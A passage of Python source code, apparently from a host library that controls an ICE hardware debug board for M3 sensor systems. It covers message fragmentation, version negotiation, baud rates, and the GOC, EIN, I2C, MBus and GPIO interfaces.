@min_proto_version("0.2")
def b_defragger(self, msg_type, event_id, length, msg):
'''
Helper function to defragment 'b' type MBus messages before forwarding.
This helper is installed by default for 'b' messages. It will attempt to
call a helper registered under the name 'b+' when a complete message has
been received. The message will be assigned the event id of the last
received fragment.
It may be safely overridden.
'''
with self.b_lock:
logger.debug("\tmsg_type: %s, event_id: %s, length: %s, msg: %s"
% (msg_type, event_id, length, repr(msg)))
assert msg_type == 'b'
self.b_frag += msg
# XXX: Make version dependent
if length != 255:
logger.debug("Got a complete MBus message of length %d bytes. Forwarding..." % (len(self.b_frag)))
self.spawn_handler('b+', event_id, len(self.b_frag), copy(self.b_frag))
self.b_frag = ''
else:
logger.debug("Got a MBus fragment... thus far %d bytes received:" % (len(self.b_frag)))
@min_proto_version("0.2")
def B_defragger(self, msg_type, event_id, length, msg):
'''
Helper function to defragment 'B' type snooped MBus messages before forwarding.
This helper is installed by default for 'B' messages. It will attempt to
call a helper registered under the name 'B+' when a complete message has
been received. The message will be assigned the event id of the last
received fragment.
It may be safely overridden.
'''
with self.B_lock:
assert msg_type == 'B'
self.B_frag += msg
# XXX: Make version dependent
if length != 255:
sys.stdout.flush()
logger.debug("Got a complete snooped MBus message. Length %d bytes. Forwarding..." % (len(self.B_frag)))
sys.stdout.flush()
self.spawn_handler('B+', event_id, len(self.B_frag), copy(self.B_frag))
self.B_frag = ''
else:
logger.debug("Got a snoop MBus fragment... thus far %d bytes received:" % (len(self.B_frag)))
@min_proto_version("0.2")
def B_formatter(self, msg_type, event_id, length, msg):
return self.common_bB_formatter(msg_type, event_id, length, msg, 'B++')
@min_proto_version("0.2")
def b_formatter(self, msg_type, event_id, length, msg):
return self.common_bB_formatter(msg_type, event_id, length, msg, 'b++')
@min_proto_version("0.2")
def common_bB_formatter(self, msg_type, event_id, length, msg, b_type):
'''
Helper function that parses 'B+' snooped MBus messages before forwarding.
This helper is installed by default for 'B+' messages. It will attempt
to call a helper registered under the name 'B++' when a complete message
has been received. B++ messages do not have the standard signature,
instead they expect a callback of the form:
Bpp_callback(address, data, control_bit_0, control_bit_1)
or
Bpp_callback(address, data)
If the second form is used, the member variable
"B_formatter_success_only" (default False) controls whether all messages
are forwarded or only messages that were ACK'd.
This function may be safely overridden.
'''
addr = msg[0:4]
data = msg[4:-1]
cb = ord(msg[-1:])
# status_bits <= `SD status_bits | {4'b0000, mbus_rxfail, mbus_rxbcast, ice_export_control_bits};
cb0 = bool(cb & 0x1)
cb1 = bool(cb & 0x2)
success = cb0 & (~cb1) # XXX Something is wrong here [also fix default]
try:
handler = self.msg_handler[b_type]
except KeyError:
logger.warn("All registered handlers: {}".format(self.msg_handler))
logger.warn("Looking up key >>{}<<".format(b_type))
try:
logger.warn("No handler registered for B++ (formatted, snooped MBus) messages")
logger.warn("Dropping message:")
logger.warn("\taddr: " + addr.decode('hex'))
logger.warn("\tdata: " + data.decode('hex'))
logger.warn("\tstat: " + cb.decode('hex'))
logger.warn("")
except Exception as e:
logger.warn("Unhandled exception trying to report missing B++ handler.")
logger.warn(str(e))
logger.warn("Suppressed.")
return
#except TypeError:
# logger.debug("Type error")
# if not self.B_formatter_success_only or (success):
# self.msg_handler[b_type](addr, data)
# else:
# logger.debug("no call")
handler(addr, data)
def send_message(self, msg_type, msg='', length=None):
if len(msg_type) != 1:
raise self.FormatError("msg_type must be exactly 1 character")
if len(msg) > 255:
raise self.FormatError("msg too long. Maximum msg is 255 bytes")
if length is None:
length = len(msg)
buf = struct.pack("BBB", ord(msg_type), self.event_id, length)
self.event_id = (self.event_id + 1) % 256
logger.debug('Sending %s', (buf+msg).encode('hex'))
self.dev.write(buf + msg)
# Ugly hack so python allows keyboard interrupts
return self.sync_queue.get(True, self.ONEYEAR)
def send_message_until_acked(self, msg_type, msg='', length=None, tries=5):
while tries:
ack, msg = self.send_message(msg_type, msg, length)
if ack == 0:
return msg
tries -= 1
raise self.NAK_Error
def negotiate_version(self):
'''
Establish communication with an ICE board.
This function is called automatically by __init__ and should not be
called directly. For ICE versions >= 0.2, this function automatically
calls ice_query_capabilities and sets up the ICE library appropriately.
'''
logger.info("This library supports versions...")
for major, minor in ICE.VERSIONS:
logger.info("\t%d.%d" % (major, minor))
logger.debug("Sending version probe")
resp = self.send_message_until_acked('V')
if (len(resp) is 0) or (len(resp) % 2):
raise self.FormatError("Version response: " + resp)
logger.info("This ICE board supports versions...")
self.major = None
self.minor = None
while len(resp) > 0:
major, minor = struct.unpack("BB", resp[:2])
resp = resp[2:]
if self.major is None and (major, minor) in ICE.VERSIONS:
self.major = major
self.minor = minor
logger.info("\t%d.%d **Chosen version" % (major, minor))
else:
logger.info("\t%d.%d" % (major, minor))
if self.major is None:
logger.warn("No versions in common. Version negotiation failed.")
raise self.ICE_Error
if self.major != 0:
logger.error("Major version number bump. Need to re-examine python versioning")
raise self.ICE_Error
self.send_message_until_acked('v', struct.pack("BB", self.major, self.minor))
if self.minor >= 2:
logger.debug("ICE version supports capabilities, querying")
self.ice_query_capabilities()
logger.debug("Capabilities: " + self.capabilities)
else:
logger.debug("Version 0.1 does not have capability support, skipping")
def min_version(self, required_version):
if required_version > 1:
logger.error("Need to fix this versioning system. Major version number bumped")
raise self.ICE_Error
required_version = int(required_version * 10)
try:
if self.minor < required_version:
raise self.VersionError(required_version, self.minor)
except AttributeError:
logger.error("Attempt to call method before version negotiation?")
raise
def _fragment_sender(self, msg_type, msg):
'''
Internal. (helper for {i2c,goc,ein,mbus}_send)
'''
# XXX: Make version dependent?
FRAG_SIZE = 255
sent = 0
logger.debug("Sending %d byte message (in %d byte fragments)" % (len(msg), FRAG_SIZE))
while len(msg) >= FRAG_SIZE:
ack,resp = self.send_message(msg_type, msg[0:FRAG_SIZE])
if ack == 1: # (NAK)
if len(resp) == 0:
logger.warning("ICE NAK'd request to send with no length sent field, assuming 0")
return sent + 0
return sent + ord(resp)
msg = msg[FRAG_SIZE:]
sent += FRAG_SIZE
logger.debug("\tSent %d byte s, %d remaining" % (sent, len(msg)))
logger.debug("Sending last message fragment, %d bytes long" % (len(msg)))
ack,resp = self.send_message(msg_type, msg)
if ack == 1:
if len(resp) == 0:
logger.warning("ICE NAK'd request to send with no length sent field, assuming 0")
return sent + 0
return sent + ord(resp)
sent += len(msg)
return sent
## QUERY / CONFIGURE ICE ##
@min_proto_version("0.2")
@capability('?')
def ice_query_capabilities(self):
'''
Queries ICE board for available hardware frontends.
The ICE library will be configured to raise an ICE.CapabilityError
if a request that is unsupported by this hardware is requested.
This interface is very raw and needs to be wrapped in something more
user-friendly and library-esque. It currently returns the raw array of
characters from the ICE board, which requires the caller to know the
ICE protocol.
'''
resp = self.send_message_until_acked('?', struct.pack("B", ord('?')))
self.capabilities = resp
return resp
@min_proto_version("0.2")
@capability('?')
def ice_get_baudrate(self):
'''
Gets the current baud rate of the ICE bridge in Hz.
XXX: Returns the ideal value, not the exact speed. Not sure which is
more correct / more useful.
'''
self.min_version(0.2)
resp = self.send_message_until_acked('?', struct.pack("B", ord('b')))
div = struct.unpack("!H", resp)[0]
if div == 0x00AE:
return 1152200
elif div == 0x0007:
return 3000000
else:
raise self.FormatError("Unknown baud divider?")
@min_proto_version("0.2")
@capability('_')
def ice_set_baudrate(self, div, baudrate):
'''
Sets a new baud rate for the ICE bridge.
Internal. This function is not meant to be called directly.
'''
self.min_version(0.2)
self.send_message_until_acked('_', struct.pack("!BH", ord('b'), div))
try:
self.dev.baudrate = baudrate
except IOError as e:
if e.errno == 25:
logger.warn("Failed to set baud rate (if socat, ignore)")
else:
raise
@min_proto_version("0.2")
@capability('_')
def ice_set_baudrate_to_115200(self):
self.ice_set_baudrate(0x00AE, 115200)
@min_proto_version("0.2")
@capability('_')
def ice_set_baudrate_to_230400(self):
self.ice_set_baudrate(0x00AE/2, 115200*2)
@min_proto_version("0.2")
@capability('_')
def ice_set_baudrate_to_460800(self):
self.ice_set_baudrate(0x00AE/4, 115200*4)
@min_proto_version("0.2")
@capability('_')
def ice_set_baudrate_to_921600(self):
self.ice_set_baudrate(0x00AE/8, 115200*8)
@min_proto_version("0.2")
@capability('_')
def ice_set_baudrate_to_1843200(self):
self.ice_set_baudrate(0x00AE/16, 115200*16)
@min_proto_version("0.2")
@capability('_')
def ice_set_baudrate_to_2000000(self):
self.ice_set_baudrate(0x000A, 2000000)
@min_proto_version("0.2")
@capability('_')
def ice_set_baudrate_to_3_megabaud(self):
self.ice_set_baudrate(0x0007, 3000000)
## GOC VS EIN HANDLING ##
def set_goc_ein(self, goc=0, ein=0, restore_clock_freq=True):
if goc == ein:
raise self.ICE_Error("Internal consistency goc vs ein failure")
if self.minor == 1:
if goc == 1:
return
else:
raise self.ICE_Error("Attempt to call set_goc_ein for ein with protocol version 1")
if ein:
# Set to EIN mode
if self.goc_ein_toggle == 0:
# Already in ein mode, nothing to do
return
if self.goc_ein_toggle == 1:
# If we were set to GOC mode, capture the clock frequency
self.goc_freq_divisor = self.goc_ein_get_freq_divisor()
if restore_clock_freq:
try:
self.goc_ein_set_freq_divisor(self.ein_freq_divisor)
logger.debug("Restored previous EIN clock frequency")
except AttributeError:
self.goc_ein_set_freq_divisor(self.EIN_DEFAULT_DIVISOR)
logger.debug("Set EIN to default clock frequency")
self.send_message_until_acked('o', struct.pack("BB", ord('p'), 0))
self.goc_ein_toggle = 0
logger.debug("Set goc/ein toggle to ein")
else:
# Set to GOC mode
if self.goc_ein_toggle == 1:
return
if self.goc_ein_toggle == 0:
self.ein_freq_divisor = self.goc_ein_get_freq_divisor()
if restore_clock_freq:
try:
self.goc_ein_set_freq_divisor(self.goc_freq_divisor)
logger.debug("Restored previous GOC clock frequency")
except AttributeError:
self.goc_ein_set_freq_divisor(self._goc_freq_in_hz_to_divisor(self.GOC_SPEED_DEFAULT_HZ))
logger.debug("Set GOC to default clock frequency")
self.send_message_until_acked('o', struct.pack("BB", ord('p'), 1))
self.goc_ein_toggle = 1
logger.debug("Set goc/ein toggle to goc")
@max_proto_version("0.2")
def goc_ein_get_freq_divisor_max_0_2(self):
resp = self.send_message_until_acked('O', struct.pack("B", ord('c')))
if len(resp) != 3:
raise self.FormatError("Wrong response length from `Oc': " + str(resp))
setting = struct.unpack("!I", "\x00"+resp)[0]
return setting
@min_proto_version("0.3")
def goc_ein_get_freq_divisor_min_0_3(self):
resp = self.send_message_until_acked('O', struct.pack("B", ord('c')))
if len(resp) != 4:
raise self.FormatError("Wrong response length from `Oc': " + str(resp))
setting = struct.unpack("!I", resp)[0]
logger.debug('got divisor value {}'.format(setting))
return setting
def goc_ein_get_freq_divisor(self):
if self.minor > 2:
return self.goc_ein_get_freq_divisor_min_0_3()
else:
return self.goc_ein_get_freq_divisor_max_0_2()
@max_proto_version("0.2")
def goc_ein_set_freq_divisor_max_0_2(self, divisor):
packed = struct.pack("!I", divisor)
if packed[0] != '\x00':
raise self.ParameterError("Out of range.")
msg = struct.pack("B", ord('c')) + packed[1:]
self.send_message_until_acked('o', msg)
@min_proto_version("0.3")
def goc_ein_set_freq_divisor_min_0_3(self, divisor):
logger.debug('set divisor to {}'.format(divisor))
packed = struct.pack("!I", divisor)
msg = struct.pack("B", ord('c')) + packed
self.send_message_until_acked('o', msg)
def goc_ein_set_freq_divisor(self, divisor):
if self.minor > 2:
return self.goc_ein_set_freq_divisor_min_0_3(divisor)
else:
return self.goc_ein_set_freq_divisor_max_0_2(divisor)
## GOC ##
GOC_SPEED_DEFAULT_HZ = .625
def _goc_display_delay(self, msg, event):
try:
freq = self.goc_freq
except AttributeError:
freq = ICE.GOC_SPEED_DEFAULT_HZ
num_bits = len(msg) * 8
t = num_bits / freq
logger.info("Sleeping for %f seconds while it blinks..." % (t))
while (t > 1):
sys.stdout.write("\r\t\t\t\t\t\t")
sys.stdout.write("\r\t%f remaining..." % (t))
sys.stdout.flush()
t -= 1
if event.is_set():
return
time.sleep(1)
time.sleep(t)
@min_proto_version("0.1")
@capability('f')
def goc_send(self, msg, show_progress=True):
'''
Blinks a message via GOC.
Takes a raw byte stream (e.g. "0xaa".decode('hex')).
Returns the number of bytes actually sent.
Long messages may be fragmented between the ICE library and the ICE
FPGA. These fragments will be combined on the ICE board, and given the
significantly lower bandwidth of the GOC interface, there should be no
interruption in message transmission.
'''
self.set_goc_ein(goc=1)
if show_progress:
e = threading.Event()
t = threading.Thread(target=self._goc_display_delay, args=(msg,e))
t.daemon = True
t.start()
ret = self._fragment_sender('f', msg)
e.set()
t.join()
else:
ret = self._fragment_sender('f', msg)
return ret
@min_proto_version("0.1")
@capability('O')
def goc_get_frequency(self):
'''
Gets the GOC frequency.
'''
self.set_goc_ein(goc=1)
if self.minor == 3:
logger.warn('ICE Firmware v0.3 reports wrong goc freq value.'\
' Returning cached value.')
try:
return self.goc_freq
except AttributeError:
logger.warn('No cached value. Querying ICE. Value is junk')
setting = self.goc_ein_get_freq_divisor()
if self.minor == 1:
NOMINAL = 2e6
else:
NOMINAL = 4e6
freq_in_hz = NOMINAL / setting
return freq_in_hz
def _goc_freq_in_hz_to_divisor(self, freq_in_hz):
if self.minor == 1:
NOMINAL = 2e6
else:
NOMINAL = 4e6
return NOMINAL / freq_in_hz;
@min_proto_version("0.1")
@capability('o')
def goc_set_frequency(self, freq_in_hz):
'''
Sets the GOC frequency.
'''
self.set_goc_ein(goc=1)
# Send a 3-byte value N, where 2 MHz / N == clock speed
self.goc_ein_set_freq_divisor(self._goc_freq_in_hz_to_divisor(freq_in_hz))
self.goc_freq = freq_in_hz
logger.debug("GOC frequency set to %f" % (freq_in_hz))
@min_proto_version("0.2")
@capability('O')
def goc_get_onoff(self):
'''
Get the current ambient GOC power.
'''
self.set_goc_ein(goc=1)
self.min_version(0.2)
resp = self.send_message_until_acked('O', struct.pack("B", ord('o')))
if len(resp) != 1:
raise self.FormatError("Wrong response length from `Oo': " + str(resp))
onoff = struct.unpack("B", resp)[0]
return bool(onoff)
@min_proto_version("0.2")
@capability('o')
def goc_set_onoff(self, onoff):
'''
Turn the GOC light on or off.
The GOC will blink as normal when goc_send is called, this simply sets
the state of the GOC light when it's not doing anything else (e.g. so
you can leave the light on for charging or something similar)
'''
self.set_goc_ein(goc=1)
self.min_version(0.2)
msg = struct.pack("BB", ord('o'), onoff)
self.send_message_until_acked('o', msg)
## I2C ##
@min_proto_version("0.1")
@capability('d')
def i2c_send(self, addr, data):
'''
Sends an I2C message.
Addr should be a single byte address.
Data should be packed binary data, as returned by struct.pack
The return value is the number of bytes actually sent *including the
address byte*.
Long messages may be fragmented between the ICE library and the ICE
FPGA. On the I2C wire, this will appear as windows of time where the I2C
clock is stretched for a period of time. A faster baud rate between the
PC host and the ICE FPGA will help mitigate this.
'''
msg = struct.pack("B", addr) + data
return self._fragment_sender('d', msg)
@min_proto_version("0.1")
@capability('I')
def i2c_get_speed(self):
'''
Get the clock speed of the ICE I2C driver in kHz.
'''
ack,msg = self.send_message('I', struct.pack("B", ord('c')))
if ack == 0:
if len(msg) != 1:
raise self.FormatError
return struct.unpack("B", msg)[0] * 2
ret = ord(msg[0])
msg = msg[1:]
if ret == errno.ENODEV:
# XXX Generalize me w.r.t. version?
return 100
else:
raise self.ICE_Error("Unknown Error")
@min_proto_version("0.1")
@capability('i')
def i2c_set_speed(self, speed):
'''
Set the clock speed of the ICE I2C driver in kHz.
The accepted range of speeds is [2,400] kHz with steps of undefined
increments. The actual set speed is returned.
Raises an ICE_Error if the speed was not set.
Note: This does *NOT* affect the clock speed of any M3 I2C drivers.
That requires sending DMA messages to each of the M3 I2C
controllers that you would like to change the speed of.
'''
if speed < 2:
speed = 2
elif speed > 400:
speed = 400
speed /= 2
ack,msg = self.send_message('i', struct.pack("BB", ord('c'), speed))
if ack == 0:
return speed
ret = ord(msg[0])
msg = msg[1:]
if ret == errno.EINVAL:
raise self.ICE_Error("ICE reports: Invalid argument.")
elif ret == errno.ENODEV:
raise self.ICE_Error("Changing I2C speed not supported.")
@min_proto_version("0.1")
@capability('I')
def i2c_get_address(self):
'''
Get the I2C address(es) of the ICE peripheral.
'''
resp = self.send_message_until_acked('I', struct.pack("B", ord('a')))
if len(resp) != 2:
raise self.FormatError("i2c address response should be 2 bytes")
ones, zeros = struct.unpack("BB", resp)
if ones == 0xff and zeros == 0xff:
return None
else:
return self.masks_to_strings(ones, zeros, 8)
@min_proto_version("0.1")
@capability('i')
def i2c_set_address(self, address=None):
'''
Set the I2C address(es) of the ICE peripheral.
The ICE board will ACK messages sent to any address that matches the
mask set by this function. The special character 'x' is used to signify
don't-care bits. As example, to pretend to be the DSP layer:
address = "1001 100x"
Spaces are permitted and ignored. To disable this feature, set the
address to None.
Default Value: DISABLED.
'''
if address is None:
ones, zeros = (0xff, 0xff)
else:
if len(address) != 8:
raise self.FormatError("Address must be exactly 8 bits")
ones, zeros = self.string_to_masks(address)
self.send_message_until_acked('i', struct.pack("BBB", ord('a'), ones, zeros))
## MBus ##
@min_proto_version("0.2")
@capability('b')
def mbus_send(self, addr, data):
'''
Sends an MBus message.
Addr may be a short address or long address. In either case, it should
be packed binary data (e.g. struct.pack or 'a5'.decode('hex'))
Data should be packed binary data, as returned by struct.pack
The return value is the number of bytes actually sent *including four
bytes for the address, regardless of whether a short or long address was
actually sent*.
Long messages may be fragmented between the ICE library and the ICE
FPGA. On the wire, this should not be noticeable as the PC<-->ICE bridge
is much faster than the MBus. If this is an issue, you must keep the
transaction size below the ICE fragmentation limit (less than 255 bytes
for combined address + data).
'''
self.min_version(0.2)
if len(addr) > 4:
raise self.FormatError("Address too long")
while len(addr) < 4:
addr = '\x00' + addr
msg = addr + data
return self._fragment_sender('b', msg)
@min_proto_version("0.3")
@capability('m')
def mbus_set_internal_reset(self, assert_reset):
'''
Control signal that holds ICE internal MBus in reset.
While in reset, the COUT and DOUT signals are held high. This is useful
for bootstrapping when multiple ICE boards are in a loop.
'''
self.min_version(0.3)
self.send_message_until_acked('m', struct.pack("B"*(1+1),
ord('r'),
bool(assert_reset),
))
@min_proto_version("0.2")
@capability('m')
def mbus_set_full_prefix(self, prefix=None):
'''
Set the full prefix(es) of the ICE peripheral.
The ICE board will ACK messages sent to any address that matches the
mask set by this function. The special character 'x' is used to signify
don't-care bits.
Spaces are permitted and ignored. To disable this feature, set the
address to None.
Default Value: DISABLED.
'''
self.min_version(0.2)
if prefix is None:
ones, zeros = (0xfffff, 0xfffff)
else:
if len(prefix) != 20:
raise self.FormatError("Prefix must be exactly 20 bits")
ones, zeros = self.string_to_masks(prefix)
ones <<= 4
zeros <<= 4
self.send_message_until_acked('m', struct.pack("B"*(1+6),
ord('l'),
(ones >> 16) & 0xff,
(ones >> 8) & 0xff,
ones & 0xff,
(zeros >> 16) & 0xff,
(zeros >> 8) & 0xff,
zeros & 0xff,
))
@min_proto_version("0.2")
@capability('M')
def mbus_get_full_prefix(self):
'''
Get the full prefix(es) set for ICE.
'''
self.min_version(0.2)
resp = self.send_message_until_acked('M', struct.pack("B", ord('l')))
if len(resp) != 6:
raise self.FormatError("Full prefix response should be 6 bytes")
o_hig, o_mid, o_low, z_hig, z_mid, z_low = struct.unpack("BBBBBB", resp)
ones = o_low | o_mid << 8 | o_hig << 16
zeros = z_low | z_mid << 8 | z_hig << 16
ones >>= 4
zeros >>= 4
if ones == 0xfffff and zeros == 0xfffff:
return None
else:
return self.masks_to_strings(ones, zeros, 20)
@min_proto_version("0.2")
@capability('m')
def mbus_set_short_prefix(self, prefix=None):
'''
Set the short prefix(es) of the ICE peripheral.
Default Value: DISABLED.
'''
self.min_version(0.2)
if prefix is None:
ones, zeros = (0xf, 0xf)
else:
if len(prefix) != 4:
raise self.FormatError("Prefix must be exactly 4 bits")
ones, zeros = self.string_to_masks(prefix)
self.send_message_until_acked('m', struct.pack("B"*(1+1),
ord('s'),
ones,
))
@min_proto_version("0.2")
@capability('M')
def mbus_get_short_prefix(self):
'''
Get the short prefix(es) set for ICE.
'''
self.min_version(0.2)
resp = self.send_message_until_acked('M', struct.pack("B", ord('s')))
if len(resp) != 2:
raise self.FormatError("Full prefix response should be 2 bytes")
ones, zeros = struct.unpack("BB", resp)
ones >>= 4
zeros >>= 4
if ones == 0xf and zeros == 0xf:
return None
else:
return self.masks_to_strings(ones, zeros, 4)
@min_proto_version("0.3")
@capability('m')
def mbus_set_snoop(self, enable, filter_prefix=None):
'''
Enable snooping of all traffic. The optional filter runs in software to limit reported messages.
Default Value: DISABLED.
'''
self.min_version(0.3)
enable = bool(enable)
if filter_prefix is not None:
raise NotImplementedError
self.send_message_until_acked('m', struct.pack("B"*(1+1),
ord('S'),
enable,
))
@min_proto_version("0.3")
@capability('M')
def mbus_get_snoop(self, return_filter=False):
'''
Return whether snooping is enabled.
'''
self.min_version(0.3)
resp = self.send_message_until_acked('M', struct.pack("B", ord('S')))
if len(resp) != 1:
raise self.FormatError("Snoop enabled response should be 1 byte")
enabled = bool(struct.unpack("B", resp))
if return_filter:
raise NotImplementedError
return enabled
@min_proto_version("0.2")
@capability('m')
def mbus_set_broadcast_channel_mask(self, mask=None):
'''
Set the broadcast mask for ICE board.
The ICE board will report and ACK any messages sent to broadcast
channels that match the mask set by this function. The special character 'x' is
used to signify don't-care bits.
Spaces are permitted and ignored. To disable this feature, set the
address to None.
Default Value: DISABLED.
'''
self.min_version(0.2)
if mask is None:
ones, zeros = (0xf, 0xf)
else:
if len(mask) != 4:
raise self.FormatError("Prefix must be exactly 4 bits")
ones, zeros = self.string_to_masks(mask)
self.send_message_until_acked('m', struct.pack("B"*(1+2),
ord('b'),
ones,
zeros,
))
@min_proto_version("0.2")
@capability('M')
def mbus_get_broadcast_channel_mask(self):
'''
Get the broadcast mask for ICE.
'''
self.min_version(0.2)
resp = self.send_message_until_acked('M', struct.pack("B", ord('b')))
if len(resp) != 2:
raise self.FormatError("Broadcast mask response should be 2 bytes")
ones, zeros = struct.unpack("BB", resp)
if ones == 0xf and zeros == 0xf:
return None
else:
return self.masks_to_strings(ones, zeros, 4)
@min_proto_version("0.2")
@capability('m')
def mbus_set_broadcast_channel_snoop_mask(self, mask=None):
'''
Set the broadcast snoop mask for ICE board.
The ICE board will report, but not ACK, any messages sent to broadcast
channels that match the mask set by this function. The special character 'x' is
used to signify don't-care bits.
Spaces are permitted and ignored. To disable this feature, set the
address to None.
Default Value: DISABLED.
'''
self.min_version(0.2)
if mask is None:
ones, zeros = (0xf, 0xf)
else:
if len(mask) != 4:
raise self.FormatError("Prefix must be exactly 4 bits")
ones, zeros = self.string_to_masks(mask)
self.send_message_until_acked('m', struct.pack("B"*(1+2),
ord('B'),
ones,
zeros,
))
@min_proto_version("0.2")
@capability('M')
def mbus_get_broadcast_channel_snoop_mask(self):
'''
Get the broadcast snoop mask for ICE.
'''
self.min_version(0.2)
resp = self.send_message_until_acked('M', struct.pack("B", ord('B')))
if len(resp) != 2:
raise self.FormatError("Broadcast mask response should be 2 bytes")
ones, zeros = struct.unpack("BB", resp)
if ones == 0xf and zeros == 0xf:
return None
else:
return self.masks_to_strings(ones, zeros, 4)
@min_proto_version("0.2")
@capability('M')
def mbus_get_master_onoff(self):
'''
Get whether ICE is acting as MBus master node.
'''
self.min_version(0.2)
resp = self.send_message_until_acked('M', struct.pack("B", ord('m')))
if len(resp) != 1:
raise self.FormatError("Wrong response length from `Mm': " + str(resp))
onoff = struct.unpack("B", resp)[0]
return bool(onoff)
@min_proto_version("0.2")
@capability('m')
def mbus_set_master_onoff(self, onoff):
'''
Set whether ICE acts as MBus master node.
DEFAULT: OFF
'''
self.min_version(0.2)
msg = struct.pack("BB", ord('m'), onoff)
self.send_message_until_acked('m', msg)
@min_proto_version("0.2")
@capability('M')
def mbus_get_clock(self):
'''
Get ICE MBus clock speed. Only meaningful if ICE is MBus master.
'''
self.min_version(0.2)
raise NotImplementedError
#resp = self.send_message_until_acked('M', struct.pack("B", ord('c')))
#if len(resp) != 1:
# raise self.FormatError, "Wrong response length from `Mc': " + str(resp)
#onoff = struct.unpack("B", resp)[0]
#return bool(onoff)
#return resp
@min_proto_version("0.2")
@capability('m')
def mbus_set_clock(self, clock_speed):
'''
Set ICE MBus clock speed. Only meaningful if ICE is MBus master.
DEFAULT: XXX
'''
self.min_version(0.2)
#msg = struct.pack("BB", ord('c'), onoff)
#self.send_message_until_acked('m', msg)
raise NotImplementedError
@min_proto_version("0.2")
@capability('M')
def mbus_get_should_interrupt(self):
'''
Get ICE MBus should interrupt setting.
TODO: Fix interface (enums?)
'''
self.min_version(0.2)
resp = self.send_message_until_acked('M', struct.pack("B", ord('i')))
resp = ord(resp)
#if len(resp) != 1:
# raise self.FormatError, "Wrong response length from `Mc': " + str(resp)
#onoff = struct.unpack("B", resp)[0]
#return bool(onoff)
return resp
@min_proto_version("0.2")
@capability('m')
def mbus_set_should_interrupt(self, should_interrupt):
'''
Set ICE MBus should interrupt setting.
DEFAULT: Off
'''
self.min_version(0.2)
msg = struct.pack("BB", ord('i'), should_interrupt)
self.send_message_until_acked('m', msg)
@min_proto_version("0.2")
@capability('M')
def mbus_get_use_priority(self):
'''
Get ICE MBus use priority setting.
TODO: Fix interface (enums?)
'''
self.min_version(0.2)
resp = self.send_message_until_acked('M', struct.pack("B", ord('p')))
resp = ord(resp)
#if len(resp) != 1:
# raise self.FormatError, "Wrong response length from `Mc': " + str(resp)
#onoff = struct.unpack("B", resp)[0]
#return bool(onoff)
return resp
@min_proto_version("0.2")
@capability('m')
def mbus_set_use_priority(self, use_priority):
'''
Set ICE MBus use priority setting.
DEFAULT: Off
'''
self.min_version(0.2)
msg = struct.pack("BB", ord('p'), use_priority)
self.send_message_until_acked('m', msg)
## EIN DEBUG ##
EIN_DEFAULT_DIVISOR = 0xFA0
@min_proto_version("0.2")
@capability('f')
def ein_send(self, msg):
'''
Sends a message via the EIN Debug port.
Takes a raw byte stream (e.g. "0xaa".decode('hex')).
Returns the number of bytes actually sent.
Long messages may be fragmented between the ICE library and the ICE
FPGA. These fragments will be combined on the ICE board. There should be
no interruption in message transmission.
'''
self.set_goc_ein(ein=1)
self.min_version(0.2)
ret = self._fragment_sender('f', msg)
return ret
## GPIO ##
# XXX TODO XXX: parameter based method version selection
GPIO_INPUT = 0
GPIO_OUTPUT = 1
GPIO_TRISTATE = 2
def gpio_get_level(self, gpio_idx):
'''
Query whether a gpio is high or low. (high=True)
'''
if self.minor == 1:
return self.gpio_get_level_0_1(gpio_idx)
else:
return self.gpio_get_level_0_2(gpio_idx)
def gpio_get_direction(self, gpio_idx):
'''
Query gpio pin setup.
Returns one of:
ICE.GPIO_INPUT
ICE.GPIO_OUTPUT
ICE.GPIO_TRISTATE
'''
if self.minor == 1:
return self.gpio_get_direction_0_1(gpio_idx)
else:
return self.gpio_get_direction_0_2(gpio_idx)
def gpio_set_level(self, gpio_idx, level):
'''
Set gpio level. (high=True)
'''
if self.minor == 1:
return self.gpio_set_level_0_1(gpio_idx, level)
else:
return self.gpio_set_level_0_2(gpio_idx, level)
def gpio_set_direction(self, gpio_idx, direction):
'''
Setup a GPIO pin.
'''
if direction not in (ICE.GPIO_INPUT, ICE.GPIO_OUTPUT, ICE.GPIO_TRISTATE):
raise self.ParameterError("Unknown direction: " + str(direction))
if self.minor == 1:
return self.gpio_set_direction_0_1(gpio_idx, direction)
else:
return self.gpio_set_direction_0_2(gpio_idx, direction)
@min_proto_version("0.1")
@max_proto_version("0.1")
@capability('G')
def gpio_get_level_0_1(self, gpio_idx):
resp = self.send_message_until_acked('G',
struct.pack('BB', ord('l'), gpio_idx))
if len(resp) != 1:
raise self.FormatError("Too long of a response from `Gl#':" + str(resp))
return bool(struct.unpack("B", resp)[0])
@min_proto_version("0.1")
@max_proto_version("0.1")
@capability('G')
def gpio_get_direction_0_1(self, gpio_idx):
resp = self.send_message_until_acked('G',
struct.pack('BB', ord('d'), gpio_idx))
if len(resp) != 1:
raise self.FormatError("Too long of a response from `Gd#':" + str(resp))
direction = struct.unpack("B", resp)[0]
if direction not in (ICE.GPIO_INPUT, ICE.GPIO_OUTPUT, ICE.GPIO_TRISTATE):
raise self.FormatError("Unknown direction: " + str(direction))
return direction
@min_proto_version("0.1")
@max_proto_version("0.1")
@capability('g')
def gpio_set_level_0_1(self, gpio_idx, level):
self.send_message_until_acked('g',
struct.pack('BBB', ord('l'), gpio_idx, level))
@min_proto_version("0.1")
@max_proto_version("0.1")
@capability('g')
def gpio_set_direction_0_1(self, gpio_idx, direction):
self.send_message_until_acked('g',
struct.pack('BBB', ord('d'), gpio_idx, direction))
def _gpio_get_level_0_2(self):
resp = self.send_message_until_acked('G', struct.pack('B', ord('l')))
if len(resp) != 3:
raise self.FormatError("Bad response from `Gl':" + str(resp))
high,mid,low = list(map(ord, resp))
return low | (mid << 8) | (high << 16)
@min_proto_version("0.2")
@capability('G')
def gpio_get_level_0_2(self, gpio_idx):
if gpio_idx >= 24:
raise self.ParameterError("Request for illegal gpio idx")
return (self._gpio_get_level_0_2() >> gpio_idx) & 0x1
def _gpio_get_direction_0_2(self):
resp = self.send_message_until_acked('G', struct.pack('B', ord('d')))
if len(resp) != 3:
raise self.FormatError("Bad response from `Gd#':" + str(resp))
high,mid,low = list(map(ord, resp))
return low | (mid << 8) | (high << 16)
@min_proto_version("0.2")
@capability('G')
def gpio_get_direction_0_2(self, gpio_idx):
if gpio_idx >= 24:
raise self.ParameterError("Request for illegal gpio idx")
if ((self._gpio_get_direction_0_2() >> gpio_idx) & 0x1) == 0:
return ICE.GPIO_INPUT
else:
return ICE.GPIO_OUTPUT
@min_proto_version("0.2")
@capability('g')
def gpio_set_level_0_2(self, gpio_idx, level):
mask = self._gpio_get_level_0_2()
if level:
mask |= (1 << gpio_idx)
else:
mask &= ~(1 << gpio_idx)
self.send_message_until_acked('g',
struct.pack('BBBB', ord('l'),
